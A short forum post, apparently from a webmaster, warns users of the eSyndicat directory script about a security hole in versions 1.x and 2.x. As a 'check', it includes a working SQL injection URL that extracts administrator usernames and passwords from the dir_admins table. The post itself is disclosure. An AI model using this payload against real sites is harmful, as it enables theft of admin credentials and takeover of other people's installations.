I think it will be posted in Security box but more webmasters use eSyndicat (their signature) here so I post here to warn. eSyndicat 1.x and 2.x have dangerous security hole. If you use eSyndicat 2.x you can check this: http://[domain[/[path_installed]/news.php?id=-1%27%20union%20select%201,username,password,4,5%20from%20dir_admins/* If you use 1.x contact me. Have fun.